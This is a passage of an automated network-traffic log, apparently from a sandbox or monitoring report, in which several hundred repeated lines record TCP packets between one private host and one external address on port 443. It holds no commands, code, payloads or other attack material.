                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
